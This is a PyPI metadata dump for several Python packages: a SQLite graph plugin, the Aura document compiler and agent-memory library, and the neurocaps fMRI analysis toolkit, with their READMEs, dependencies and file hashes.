metadata_version
string
name
string
version
string
summary
string
description
string
description_content_type
string
author
string
author_email
string
maintainer
string
maintainer_email
string
license
string
keywords
string
classifiers
list
platform
list
home_page
string
download_url
string
requires_python
string
requires
list
provides
list
obsoletes
list
requires_dist
list
provides_dist
list
obsoletes_dist
list
requires_external
list
project_urls
list
uploaded_via
string
upload_time
timestamp[us]
filename
string
size
int64
path
string
python_version
string
packagetype
string
comment_text
string
has_signature
bool
md5_digest
string
sha256_digest
string
blake2_256_digest
string
license_expression
string
license_files
list
recent_7d_downloads
int64
2.2
cjm-graph-plugin-sqlite
0.0.4
A local, file-backed Context Graph worker for the cjm-plugin-system that implements graph storage, traversal, and querying using SQLite.
# cjm-graph-plugin-sqlite <!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! --> ## Install ``` bash pip install cjm_graph_plugin_sqlite ``` ## Project Structure nbs/ ├── meta.ipynb # Metadata introspection for the SQLite Graph plugin used by cjm-ctl to generate the registration manifest. └── plugin.ipynb # Plugin implementation for Context Graph using SQLite Total: 2 notebooks ## Module Dependencies ``` mermaid graph LR meta[meta<br/>Metadata] plugin[plugin<br/>SQLite Graph Plugin] plugin --> meta ``` *1 cross-module dependencies detected* ## CLI Reference No CLI commands found in this project. ## Module Overview Detailed documentation for each module in the project: ### Metadata (`meta.ipynb`) > Metadata introspection for the SQLite Graph plugin used by cjm-ctl to > generate the registration manifest. #### Import ``` python from cjm_graph_plugin_sqlite.meta import ( get_plugin_metadata ) ``` #### Functions ``` python def get_plugin_metadata() -> Dict[str, Any]: # Plugin metadata for manifest generation """Return metadata required to register this plugin with the PluginManager.""" # Fallback base path (current behavior for backward compatibility) base_path = os.path.dirname(os.path.dirname(sys.executable)) # Use CJM config if available, else fallback to env-relative paths cjm_data_dir = os.environ.get("CJM_DATA_DIR") # Plugin data directory plugin_name = "cjm-graph-plugin-sqlite" package_name = plugin_name.replace("-", "_") if cjm_data_dir "Return metadata required to register this plugin with the PluginManager." ``` ### SQLite Graph Plugin (`plugin.ipynb`) > Plugin implementation for Context Graph using SQLite #### Import ``` python from cjm_graph_plugin_sqlite.plugin import ( SQLiteGraphPluginConfig, SQLiteGraphPlugin ) ``` #### Classes ``` python @dataclass class SQLiteGraphPluginConfig: "Configuration for SQLite Graph Plugin." db_path: Optional[str] = field(...) readonly: bool = field(...) ``` ``` python class SQLiteGraphPlugin: def __init__(self): self.logger = logging.getLogger(f"{__name__}.{type(self).__name__}") self.config: SQLiteGraphPluginConfig = None "Local, file-backed Context Graph implementation using SQLite." def __init__(self): self.logger = logging.getLogger(f"{__name__}.{type(self).__name__}") self.config: SQLiteGraphPluginConfig = None def name(self) -> str: # Plugin name identifier """Get the plugin name identifier.""" return "sqlite_graph" @property def version(self) -> str: # Plugin version string "Get the plugin name identifier." def version(self) -> str: # Plugin version string """Get the plugin version string.""" return "0.1.0" def get_current_config(self) -> Dict[str, Any]: # Current configuration as dictionary "Get the plugin version string." def get_current_config(self) -> Dict[str, Any]: # Current configuration as dictionary """Return current configuration state.""" if not self.config "Return current configuration state." def get_config_schema(self) -> Dict[str, Any]: # JSON Schema for configuration """Return JSON Schema for UI generation.""" return dataclass_to_jsonschema(SQLiteGraphPluginConfig) def initialize( self, config: Optional[Any] = None # Configuration dataclass, dict, or None ) -> None "Return JSON Schema for UI generation." def initialize( self, config: Optional[Any] = None # Configuration dataclass, dict, or None ) -> None "Initialize DB connection and schema." def execute( self, action: str = "get_schema", # Action to perform **kwargs ) -> Dict[str, Any]: # JSON-serializable result "Dispatch to appropriate method based on action." def add_nodes( self, nodes: List[GraphNode] # Nodes to create ) -> List[str]: # Created node IDs "Bulk create nodes." def add_edges( self, edges: List[GraphEdge] # Edges to create ) -> List[str]: # Created edge IDs "Bulk create edges." def get_node( self, node_id: str # UUID of node to retrieve ) -> Optional[GraphNode]: # Node or None if not found "Get a single node by ID." def get_edge( self, edge_id: str # UUID of edge to retrieve ) -> Optional[GraphEdge]: # Edge or None if not found "Get a single edge by ID." def find_nodes_by_source( self, source_ref: SourceRef # External resource reference ) -> List[GraphNode]: # Nodes attached to this source "Find all nodes linked to a specific external resource." def find_nodes_by_label( self, label: str, # Node label to search for limit: int = 100 # Max results ) -> List[GraphNode]: # Matching nodes "Find nodes by label." def get_context( self, node_id: str, # Starting node UUID depth: int = 1, # Traversal depth (1 = immediate neighbors) filter_labels: Optional[List[str]] = None # Only include nodes with these labels ) -> GraphContext: # Subgraph containing node and its neighborhood "Get the neighborhood of a specific node." def update_node( self, node_id: str, # UUID of node to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of node properties." def update_edge( self, edge_id: str, # UUID of edge to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of edge properties." def delete_nodes( self, node_ids: List[str], # UUIDs of nodes to delete cascade: bool = True # Also delete connected edges ) -> int: # Number of nodes deleted "Delete nodes (and optionally connected edges)." def delete_edges( self, edge_ids: List[str] # UUIDs of edges to delete ) -> int: # Number of edges deleted "Delete edges." def get_schema(self) -> Dict[str, Any]: # Graph schema/ontology """Return the current ontology/schema of the graph.""" schema = {"node_labels": [], "edge_types": [], "counts": {}} "Return the current ontology/schema of the graph." def import_graph( self, graph_data: GraphContext, # Data to import merge_strategy: str = "overwrite" # "overwrite", "skip", or "merge" ) -> Dict[str, int]: # Import statistics {nodes_created, edges_created, ...} "Bulk import a GraphContext (e.g., from backup or another plugin)." def export_graph( self, filter_query: Optional[GraphQuery] = None # Optional filter ) -> GraphContext: # Exported subgraph or full graph "Export the entire graph or a filtered subset." def cleanup(self) -> None "Clean up resources." ```
text/markdown
Christian J. Mills
9126128+cj-mills@users.noreply.github.com
null
null
Apache Software License 2.0
nbdev jupyter notebook python
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Natural Language :: English", "Programming Language :: Python :: 3.12", "License :: OSI Approved :: Apache Software License" ]
[]
https://github.com/cj-mills/cjm-graph-plugin-sqlite
null
>=3.12
[]
[]
[]
[ "cjm_graph_plugin_system" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:34:09.330990
cjm_graph_plugin_sqlite-0.0.4.tar.gz
17,063
7a/6d/db5d34b476736d3fd6fc0344a6b009120b18d7ad6a502c423a2848de2d45/cjm_graph_plugin_sqlite-0.0.4.tar.gz
source
sdist
null
false
c10305db84f1554382dbbeafa6c7e2ab
fdc72ec6fa17d349126c9d8ece02708cadd56db096cfe06ba3d467a097eb40be
7a6ddb5d34b476736d3fd6fc0344a6b009120b18d7ad6a502c423a2848de2d45
null
[]
247
2.4
auralith-aura
0.2.2
The Universal Context Compiler for AI Agent Memory
<p align="center"> <img src="logo.png" alt="Auralith Logo" width="120"> <h1 align="center">Aura: The Universal Context Compiler</h1> <p align="center"> <strong>Compile any document into AI-ready knowledge bases with built-in agent memory.</strong> </p> </p> <p align="center"> <a href="https://pypi.org/project/auralith-aura/"><img src="https://badge.fury.io/py/auralith-aura.svg" alt="PyPI version"></a> <a href="https://github.com/Auralith-Inc/aura-core#-license"><img src="https://img.shields.io/badge/License-Apache_2.0_+_Proprietary-blue.svg" alt="License"></a> <a href="https://www.python.org/downloads/"><img src="https://img.shields.io/badge/python-3.8+-blue.svg" alt="Python 3.8+"></a> <a href="https://github.com/Auralith-Inc/aura-core"><img src="https://img.shields.io/badge/platform-macOS%20%7C%20Windows%20%7C%20Linux-lightgrey" alt="Platform"></a> </p> <p align="center"> <a href="#-quick-start">Quick Start</a> • <a href="#-agent-memory">Agent Memory</a> • <a href="#-agent-integrations">Integrations</a> • <a href="#-rag-support">RAG Support</a> • <a href="https://aura.auralith.org">Website</a> </p> --- ## Context is the new Compute. Aura compiles messy, real-world files (PDFs, DOCX, HTML, code, spreadsheets — **60+ formats**) into a single optimized binary (`.aura`) ready for **RAG retrieval** and **AI agent memory**. One command. No JSONL scripting. No parsing pipelines. ```bash pip install auralith-aura aura compile ./my_data/ --output knowledge.aura ``` --- ## ⚡ Quick Start ### 1. Install ```bash pip install auralith-aura # For full document support (PDFs, DOCX, etc.) pip install 'aura-core[all]' ``` ### 2. Compile ```bash # Basic compilation aura compile ./company_data/ --output knowledge.aura # With PII masking (emails, phones, SSNs automatically redacted) aura compile ./data/ --output knowledge.aura --pii-mask # Filter low-quality content aura compile ./data/ --output knowledge.aura --min-quality 0.3 ``` ### 3. Use **For RAG (Knowledge Retrieval):** ```python from aura.rag import AuraRAGLoader loader = AuraRAGLoader("knowledge.aura") text = loader.get_text_by_id("doc_001") # Framework wrappers langchain_docs = loader.to_langchain_documents() llama_docs = loader.to_llama_index_documents() ``` **For Agent Memory:** ```python from aura.memory import AuraMemoryOS memory = AuraMemoryOS() # Write to memory tiers memory.write("fact", "User prefers dark mode", source="agent") memory.write("episodic", "Discussed deployment strategy") memory.write("pad", "TODO: check auth module") # Search memory results = memory.query("user preferences") # End session (flushes to durable shards) memory.end_session() ``` --- ## 🧠 Agent Memory Aura includes a **3-Tier Memory OS** — a persistent memory architecture for AI agents: | Tier | Purpose | Lifecycle | |------|---------|-----------| | `/pad` | Working notes, scratch space | Transient | | `/episodic` | Session transcripts, conversation history | Auto-archived | | `/fact` | Verified facts, user preferences | Persistent | The Memory OS is **included free** when you install from PyPI (`pip install auralith-aura`). ```bash # CLI memory management aura memory list # View all memory shards aura memory usage # Storage usage by tier aura memory prune --before 2026-01-01 # Clean up old memories ``` --- ## 🤖 Agent Integrations Aura works natively with the major AI agent platforms: | Platform | Repo | Use Case | |----------|------|----------| | **OpenClaw** | [`aura-openclaw`](https://github.com/Auralith-Inc/aura-openclaw) | Persistent RAG + memory for always-on agents | | **Claude Code** | [`aura-claude-code`](https://github.com/Auralith-Inc/aura-claude-code) | Context-aware coding with `/aura` commands | | **OpenAI Codex** | [`aura-codex`](https://github.com/Auralith-Inc/aura-codex) | Knowledge-backed Codex agents | | **Gemini CLI** | [`aura-gemini-cli`](https://github.com/Auralith-Inc/aura-gemini-cli) | Gemini CLI extension for RAG | ### How It Works (Agent RAG Flow) ``` You: "Learn everything in my /docs/ folder" → Agent runs: aura compile ./docs/ --output knowledge.aura → Agent loads: AuraRAGLoader("knowledge.aura") → You: "What does the auth module do?" → Agent queries the .aura file and responds with cited answers ``` --- ## 🌟 Key Features | Feature | Description | |---------|-------------| | **Universal Ingestion** | Parses 60+ formats: PDF, DOCX, HTML, MD, CSV, code, and more | | **Agent Memory OS** | 3-tier memory (pad/episodic/fact) with instant writes | | **PII Masking** | Automatically redacts emails, phones, SSNs before compilation | | **Instant RAG** | Query any document by keyword or ID. LangChain + LlamaIndex wrappers | | **Quality Filtering** | Skip low-quality content with configurable thresholds | | **Cross-Platform** | macOS, Windows, and Linux | | **Secure by Design** | No pickle. No arbitrary code execution. Safe to share. | --- ## 📁 Supported File Formats <details> <summary><b>Documents</b> - PDF, DOCX, HTML, and more</summary> - `.pdf`, `.docx`, `.doc`, `.rtf`, `.odt`, `.epub`, `.txt`, `.pages`, `.wpd` - `.html`, `.htm`, `.xml` - `.eml`, `.msg` (emails) - `.pptx`, `.ppt` (presentations) </details> <details> <summary><b>Data</b> - Spreadsheets and structured data</summary> - `.csv`, `.tsv` - `.xlsx`, `.xls` - `.parquet` - `.json`, `.jsonl` - `.yaml`, `.yml`, `.toml` </details> <details> <summary><b>Code</b> - All major programming languages</summary> - **Python**: `.py`, `.pyi`, `.ipynb` - **Web**: `.js`, `.ts`, `.jsx`, `.tsx`, `.css` - **Systems**: `.c`, `.cpp`, `.h`, `.hpp`, `.rs`, `.go`, `.java`, `.kt`, `.swift` - **Scripts**: `.sh`, `.bash`, `.zsh`, `.ps1`, `.bat` - **Backend**: `.sql`, `.php`, `.rb`, `.cs`, `.scala` - **Config**: `.ini`, `.cfg`, `.conf`, `.env`, `.dockerfile` </details> <details> <summary><b>Markup</b> - Documentation formats</summary> - `.md` (Markdown) - `.rst` (reStructuredText) - `.tex`, `.latex` </details> --- ## 🔧 CLI Reference ```bash aura compile <input_directory> --output <file.aura> [options] Options: --pii-mask Mask PII (emails, phones, SSNs) --min-quality SCORE Filter low-quality content (0.0-1.0) --domain DOMAIN Tag with domain context --no-recursive Don't search subdirectories --verbose, -v Verbose output ``` ### Memory Management ```bash aura memory list # List all memory shards aura memory usage # Show storage by tier aura memory prune --before 2026-01-01 # Remove old shards aura memory prune --id <shard_id> # Remove specific shard ``` ### Inspect an Archive ```bash aura info knowledge.aura 📦 Aura Archive: knowledge.aura Datapoints: 1,234 Sample datapoint: Tensors: ['raw_text'] Source: legal/contract_001.pdf ``` --- ## 🔌 RAG Support ```python from aura.rag import AuraRAGLoader loader = AuraRAGLoader("knowledge.aura") # Text retrieval text = loader.get_text_by_id("doc_001") # Filter documents pdf_docs = loader.filter_by_extension(".pdf") legal_docs = loader.filter_by_source("legal/") # Framework wrappers langchain_docs = loader.to_langchain_documents() # LangChain llama_docs = loader.to_llama_index_documents() # LlamaIndex dict_list = loader.to_dict_list() # Universal # Statistics stats = loader.get_stats() ``` --- ## 📐 File Format Specification The `.aura` format is a secure, indexed binary archive: ``` [Datapoint 1][Datapoint 2]...[Datapoint N][Index][Footer] Each Datapoint: [meta_length: 4 bytes, uint32] [tensor_length: 4 bytes, uint32] [metadata: msgpack bytes] [tensors: safetensors bytes] Footer: [index_offset: 8 bytes, uint64] [magic: 4 bytes, 'AURA'] ``` **Security**: Uses `safetensors` (not pickle) — safe to load untrusted files. --- ## 💻 Runs Locally Aura compiles entirely on your local machine — no cloud uploads, no external APIs, no telemetry. - **Runs on your local hardware** — any modern laptop or desktop, your setup, your choice - **Fully offline** — zero internet required after install - **Cross-platform** — macOS, Windows, Linux - **Python 3.8+** Your documents never leave your hardware. --- ## 🚀 Scale Up with OMNI Aura handles local compilation. For enterprise-scale training pipelines, model fine-tuning, and production-grade agent infrastructure — there's **OMNI**. - Cloud-scale data compilation & training pipelines - Supervised model fine-tuning with emphasis weighting - Production agent memory infrastructure - Team collaboration & enterprise compliance **[Explore OMNI →](https://omni.auralith.org)** --- ## 📜 License - **Compiler, RAG, Loader, Binary Format**: [Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0) - **Memory OS**: Proprietary — free to use, included in PyPI package. See [LICENSE-MEMORY](https://github.com/Auralith-Inc/aura-core/blob/main/LICENSE-MEMORY). --- ## 🔗 Links - **Website**: [aura.auralith.org](https://aura.auralith.org) - **PyPI**: [pypi.org/project/auralith-aura](https://pypi.org/project/auralith-aura) - **GitHub**: [github.com/Auralith-Inc/aura-core](https://github.com/Auralith-Inc/aura-core) - **OpenClaw Skill**: [github.com/Auralith-Inc/aura-openclaw](https://github.com/Auralith-Inc/aura-openclaw) --- <p align="center"> Made with ❤️ by <a href="https://auralith.org">Auralith Inc.</a> </p>
text/markdown
Auralith Inc.
"Auralith Inc." <info@auralith.org>
null
null
Apache-2.0 AND Proprietary
ai, agent-memory, rag, retrieval-augmented-generation, context-compiler, openclaw, claude-code, codex, gemini-cli, llm, knowledge-base
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Pyth...
[]
https://github.com/Auralith-Inc/aura-core
null
>=3.8
[]
[]
[]
[ "numpy>=1.21.0", "msgpack>=1.0.0", "safetensors>=0.3.0", "tqdm>=4.60.0", "unstructured>=0.10.0; extra == \"docs\"", "pypdf>=3.0.0; extra == \"docs\"", "python-docx>=0.8.11; extra == \"docs\"", "pandas>=1.3.0; extra == \"data\"", "openpyxl>=3.0.0; extra == \"data\"", "pyarrow>=10.0.0; extra == \"da...
[]
[]
[]
[ "Homepage, https://aura.auralith.org", "Documentation, https://github.com/Auralith-Inc/aura-core#readme", "Repository, https://github.com/Auralith-Inc/aura-core.git", "Issues, https://github.com/Auralith-Inc/aura-core/issues", "Changelog, https://github.com/Auralith-Inc/aura-core/releases" ]
twine/6.2.0 CPython/3.10.0
2026-02-19T22:33:55.191494
auralith_aura-0.2.2.tar.gz
50,822
61/4e/a00d1d6752e8904fbe4d1667c5beb1b0f17538511d3cad321d05ca3a1f27/auralith_aura-0.2.2.tar.gz
source
sdist
null
false
3e4ee3e0ae90f3d8cc162079ee90b91b
3fe3d814a750b75c3b17b8079e0bb72a3dc59eb82a0543bb7d3dc7dea5e30b17
614ea00d1d6752e8904fbe4d1667c5beb1b0f17538511d3cad321d05ca3a1f27
null
[ "LICENSE", "LICENSE-MEMORY" ]
240
2.4
neurocaps
0.37.2
Co-activation Patterns (CAPs) Python package
# NeuroCAPs: Neuroimaging Co-Activation Patterns [![Latest Version](https://img.shields.io/pypi/v/neurocaps.svg)](https://pypi.python.org/pypi/neurocaps/) [![Python Versions](https://img.shields.io/pypi/pyversions/neurocaps.svg)](https://pypi.python.org/pypi/neurocaps/) [![DOI](https://img.shields.io/badge/DOI-10.5281%2Fzenodo.11642615-teal)](https://doi.org/10.5281/zenodo.18529846) [![Test Status](https://github.com/donishadsmith/neurocaps/actions/workflows/testing.yaml/badge.svg)](https://github.com/donishadsmith/neurocaps/actions/workflows/testing.yaml) [![Documentation Status](https://readthedocs.org/projects/neurocaps/badge/?version=stable)](http://neurocaps.readthedocs.io/en/stable/?badge=stable) [![codecov](https://codecov.io/github/donishadsmith/neurocaps/branch/main/graph/badge.svg?token=WS2V7I16WF)](https://codecov.io/github/donishadsmith/neurocaps) [![Docker](https://img.shields.io/badge/Docker-donishadsmith/neurocaps-darkblue.svg?logo=docker)](https://hub.docker.com/r/donishadsmith/neurocaps/tags/) [![JOSS](https://joss.theoj.org/papers/0e5c44d5d82402fa0f28e6a8833428f0/status.svg)](https://joss.theoj.org/papers/0e5c44d5d82402fa0f28e6a8833428f0) NeuroCAPs (**Neuro**imaging **C**o-**A**ctivation **P**attern**s**) is a Python package for performing Co-Activation Patterns (CAPs) analyses on resting-state or task-based fMRI data. CAPs identifies recurring brain states by applying k-means clustering on BOLD timeseries data [^1]. <p align="center"> <img src="docs/assets/workflow.png" width="400" height="700"> </p> ## Installation **Requires Python 3.9-3.14.** ### Standard Installation ```bash pip install neurocaps ``` **Windows Users**: Enable [long paths](https://learn.microsoft.com/en-us/windows/win32/fileio/maximum-file-path-limitation?tabs=powershell) and use: ```bash pip install neurocaps[windows] ``` ### Development Version ```bash git clone --depth 1 https://github.com/donishadsmith/neurocaps/ cd neurocaps pip install -e . # For windows # pip install -e .[windows] # Clone with submodules to include test data ~140 MB git submodule update --init ``` ## Docker A [Docker](https://docs.docker.com/) image is available with demos and headless VTK display configured: ```bash # Pull image docker pull donishadsmith/neurocaps && docker tag donishadsmith/neurocaps neurocaps # Run interactive bash docker run -it neurocaps # Run Jupyter Notebook docker run -it -p 9999:9999 neurocaps notebook ``` ## Features NeuroCAPs is built around two main classes (`TimeseriesExtractor` and `CAP`) and includes several features to perform the complete CAPs workflow from postprocessing to visualizations. Notable features includes: | Component | Key Features | | -------- | ------------| | **Timeseries Extraction (`TimeseriesExtractor`)** | <ul><li>supports Schaefer, AAL, and deterministic custom parcellations</li><li>performs nuisance regression and motion scrubbing</li><li>reports quality control based on framewise displacement<br><br><b>Important</b>: Optimized for BIDS-compliant data preprocessed with <a href="https://fmriprep.org/en/stable/">fMRIPrep</a> and assumes data is BIDs compliant. Refer to <a href="https://neurocaps.readthedocs.io/en/stable/bids.html">NeuroCAPs' BIDS Structure and Entities Documentation</a> for additional information.</li></ul> | | **CAPs Analysis (`CAP`)** | <ul><li>performs k-means clustering</li><li>finds the optimal number of clusters (silhouette, elbow, variance ratio, Davies-Bouldin)</li><li>computes temporal dynamic metrics (temporal fraction, persistence, counts, transition frequency and probabilities) [^2] [^3]</li><li>converts CAPs to NIfTI images</li><li>creates visualizations (heatmaps, outer products, surface plots, correlation matrices, cosine similarity radar plots [^4] [^5]).</li></ul> | | **Standalone Functions** | <ul><li>plots transition matrices</li><li>merges timeseries data across tasks or sessions [^6]</li><li>generates and fetches custom parcellation approaches</li></ul> | Full details for every function and parameter are available in the [API Documentation](https://neurocaps.readthedocs.io/en/stable/api.html). ## Quick Start The following code demonstrates basic usage of NeuroCAPs (with simulated data) to perform CAPs analysis. A version of this example using real data from [OpenNeuro](https://openneuro.org/) is available on the [readthedocs](https://neurocaps.readthedocs.io/en/stable/tutorials/tutorial-8.html). Additional [tutorials]([demos](https://neurocaps.readthedocs.io/en/stable/tutorials/)) and [interactive demonstrations](https://github.com/donishadsmith/neurocaps/tree/main/demos) are also available. 1. Extract timeseries data ```python import numpy as np from neurocaps.extraction import TimeseriesExtractor from neurocaps.utils import simulate_bids_dataset # Set seed np.random.seed(0) # Generate a BIDS directory with fMRIPrep derivatives bids_root = simulate_bids_dataset(n_subs=3, n_runs=1, n_volumes=100, task_name="rest") # Using Schaefer, one of the default parcellation approaches parcel_approach = {"Schaefer": {"n_rois": 100, "yeo_networks": 7}} # List of fMRIPrep-derived confounds for nuisance regression acompcor_names = [f"a_comp_cor_0{i}" for i in range(5)] confound_names = ["cosine*", "trans*", "rot*", *acompcor_names] # Initialize extractor with signal cleaning parameters extractor = TimeseriesExtractor( space="MNI152NLin2009cAsym", parcel_approach=parcel_approach, confound_names=confound_names, standardize=False, # Run discarded if more than 30% of volumes exceed FD threshold fd_threshold={"threshold": 0.90, "outlier_percentage": 0.30}, ) # Extract preprocessed BOLD data extractor.get_bold(bids_dir=bids_root, task="rest", tr=2, n_cores=1, verbose=False) # Check QC information qc_df = extractor.report_qc() print(qc_df) ``` ![Quality Control Dataframe.](paper/qc_df.png) 2. Use k-means clustering to identify the optimal number of CAPs from the data using a heuristic ```python from neurocaps.analysis import CAP from neurocaps.utils import PlotDefaults # Initialize CAP class cap_analysis = CAP(parcel_approach=extractor.parcel_approach, groups=None) plot_kwargs = {**PlotDefaults.get_caps(), "figsize": (4, 3), "step": 2} # Find optimal CAPs (2-20) using silhouette method; results are stored cap_analysis.get_caps( subject_timeseries=extractor.subject_timeseries, n_clusters=range(2, 21), standardize=True, cluster_selection_method="silhouette", max_iter=500, n_init=10, show_figs=True, **plot_kwargs, ) ``` <img src="paper/silhouette_plot.png" alt="Silhouette Score Plot." style="width:46%; height:auto;"> 3. Compute temporal dynamic metrics for downstream statistical analyses ```python # Calculate temporal fraction of each CAP metric_dict = cap_analysis.calculate_metrics( extractor.subject_timeseries, metrics=["temporal_fraction"] ) print(metric_dict["temporal_fraction"]) ``` ![Temporal Fraction Dataframe.](paper/temporal_fraction_df.png) Note that CAP-1 is the dominant brain state across subjects (highest frequency). 4. Visualize CAPs ```python # Create surface and radar plots for each CAP surface_kwargs = {**PlotDefaults.caps2surf(), "layout": "row", "size": (500, 100)} radar_kwargs = {**PlotDefaults.caps2radar(), "height": 400, "width": 485} radar_kwargs["radialaxis"] = {"range": [0, 0.4], "tickvals": [0.1, "", "", 0.4]} radar_kwargs["legend"] = {"yanchor": "top", "y": 0.75, "x": 1.15} cap_analysis.caps2surf(**surface_kwargs).caps2radar(**radar_kwargs) ``` <img src="paper/cap_1_surface.png" alt="CAP-1 Surface Image." style="width:46%; height:auto;"> <img src="paper/cap_2_surface.png" alt="CAP-2 Surface Image." style="width:46%; height:auto;"> <img src="paper/cap_1_radar.png" alt="CAP-1 Radar Image." style="width:46%; height:auto;"> <img src="paper/cap_2_radar.png" alt="CAP-2 Radar Image." style="width:46%; height:auto;"> Radar plots show network alignment (measured by cosine similarity): "High Amplitude" represents alignment to activations (> 0), "Low Amplitude" represents alignment to deactivations (< 0). Each CAP can be characterized using either maximum alignment (CAP-1: Vis+/SomMot-; CAP-2: SomMot+/Vis-) or predominant alignment ("High Amplitude" − "Low Amplitude"; CAP-1: SalVentAttn+/SomMot-; CAP-2: SomMot+/SalVentAttn-). ```python import pandas as pd for cap_name in cap_analysis.caps["All Subjects"]: df = pd.DataFrame(cap_analysis.cosine_similarity["All Subjects"][cap_name]) df["Net"] = df["High Amplitude"] - df["Low Amplitude"] df["Regions"] = cap_analysis.cosine_similarity["All Subjects"]["Regions"] print(f"{cap_name}:", "\n", df, "\n") ``` CAP-1: <img src="paper/cap_1_alignment_df.png" alt="CAP-1 Network Alignment Dataframe." style="width:46%; height:auto;"> CAP-2: <img src="paper/cap_2_alignment_df.png" alt="CAP-2 Network Alignment Dataframe." style="width:46%; height:auto;"> **Note**: For information about logging, refer to [NeuroCAPs' Logging Guide](https://neurocaps.readthedocs.io/en/stable/user_guide/logging.html). ## Citing If you would like to cite NeuroCAPs, you can use: ``` Smith, D., (2025). NeuroCAPs: A Python Package for Performing Co-Activation Patterns Analyses on Resting-State and Task-Based fMRI Data. Journal of Open Source Software, 10(112), 8196, https://doi.org/10.21105/joss.08196 ``` ## Reporting Issues Bug reports, feature requests, and documentation enhancements can be reported using the templates offered when creating a new issue in the [issue tracker](https://github.com/donishadsmith/neurocaps/issues). ## Contributing Please refer the [contributing guidelines](https://neurocaps.readthedocs.io/en/stable/contributing.html) on how to contribute to NeuroCAPs. ## Acknowledgements NeuroCAPs relies on several popular data processing, machine learning, neuroimaging, and visualization [packages](https://neurocaps.readthedocs.io/en/stable/#dependencies). Additionally, some foundational concepts in this package take inspiration from features or design patterns implemented in other neuroimaging Python packages, specifically: - mtorabi59's [pydfc](https://github.com/neurodatascience/dFC), a toolbox that allows comparisons among several popular dynamic functionality methods. - 62442katieb's [IDConn](https://github.com/62442katieb/IDConn), a pipeline for assessing individual differences in resting-state or task-based functional connectivity. ## References [^1]: Liu, X., Chang, C., & Duyn, J. H. (2013). Decomposition of spontaneous brain activity into distinct fMRI co-activation patterns. Frontiers in Systems Neuroscience, 7. https://doi.org/10.3389/fnsys.2013.00101 [^2]: Liu, X., Zhang, N., Chang, C., & Duyn, J. H. (2018). Co-activation patterns in resting-state fMRI signals. NeuroImage, 180, 485–494. https://doi.org/10.1016/j.neuroimage.2018.01.041 [^3]: Yang, H., Zhang, H., Di, X., Wang, S., Meng, C., Tian, L., & Biswal, B. (2021). Reproducible coactivation patterns of functional brain networks reveal the aberrant dynamic state transition in schizophrenia. NeuroImage, 237, 118193. https://doi.org/10.1016/j.neuroimage.2021.118193 [^4]: Zhang, R., Yan, W., Manza, P., Shokri-Kojori, E., Demiral, S. B., Schwandt, M., Vines, L., Sotelo, D., Tomasi, D., Giddens, N. T., Wang, G., Diazgranados, N., Momenan, R., & Volkow, N. D. (2023). Disrupted brain state dynamics in opioid and alcohol use disorder: attenuation by nicotine use. Neuropsychopharmacology, 49(5), 876–884. https://doi.org/10.1038/s41386-023-01750-w [^5]: Ingwersen, T., Mayer, C., Petersen, M., Frey, B. M., Fiehler, J., Hanning, U., Kühn, S., Gallinat, J., Twerenbold, R., Gerloff, C., Cheng, B., Thomalla, G., & Schlemm, E. (2024). Functional MRI brain state occupancy in the presence of cerebral small vessel disease — A pre-registered replication analysis of the Hamburg City Health Study. Imaging Neuroscience, 2, 1–17. https://doi.org/10.1162/imag_a_00122 [^6]: Kupis, L., Romero, C., Dirks, B., Hoang, S., Parladé, M. V., Beaumont, A. L., Cardona, S. M., Alessandri, M., Chang, C., Nomi, J. S., & Uddin, L. Q. (2020). Evoked and intrinsic brain network dynamics in children with autism spectrum disorder. NeuroImage: Clinical, 28, 102396. https://doi.org/10.1016/j.nicl.2020.102396
text/markdown
null
Donisha Smith <donishasmith@outlook.com>
null
null
null
python, Co-Activation Patterns, CAPs, neuroimaging, fmri, dfc, dynamic functional connectivity, fMRIPrep
[ "Intended Audience :: Education", "Intended Audience :: Science/Research", "Topic :: Scientific/Engineering", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: ...
[]
null
null
>=3.9.0
[]
[]
[]
[ "numpy>=1.26.3", "pandas>=2.1.0", "joblib>=1.3.0", "matplotlib>=3.6.0", "seaborn>=0.11.0", "kneed>=0.8.5", "nibabel>=5.0.0", "nilearn>=0.10.4", "scikit-learn>=1.4.0", "scipy>=1.10.0", "brainspace>=0.1.16", "surfplot>=0.2.0", "neuromaps>=0.0.5", "pybids>=0.16.5; platform_system != \"Windows...
[]
[]
[]
[ "Homepage, https://neurocaps.readthedocs.io", "Github, https://github.com/donishadsmith/neurocaps", "Issues, https://github.com/donishadsmith/neurocaps/issues", "Changelog, https://neurocaps.readthedocs.io/en/stable/changelog.html" ]
twine/6.2.0 CPython/3.9.25
2026-02-19T22:33:52.434898
neurocaps-0.37.2.tar.gz
117,146
ad/78/8f9f4fb0c1ef3eb5d947ce904c5a2e724a189f0647e329051cd68b239d8b/neurocaps-0.37.2.tar.gz
source
sdist
null
false
25275fda4876bf4e919b44b76a9072f3
8fa4021b72ad0dd66d8ccf80d6079ead2a5430828a9f465612b22961abb0b434
ad788f9f4fb0c1ef3eb5d947ce904c5a2e724a189f0647e329051cd68b239d8b
MIT
[ "LICENSE.md" ]
238
2.4
atlas-ftag-tools
0.3.1
ATLAS Flavour Tagging Tools
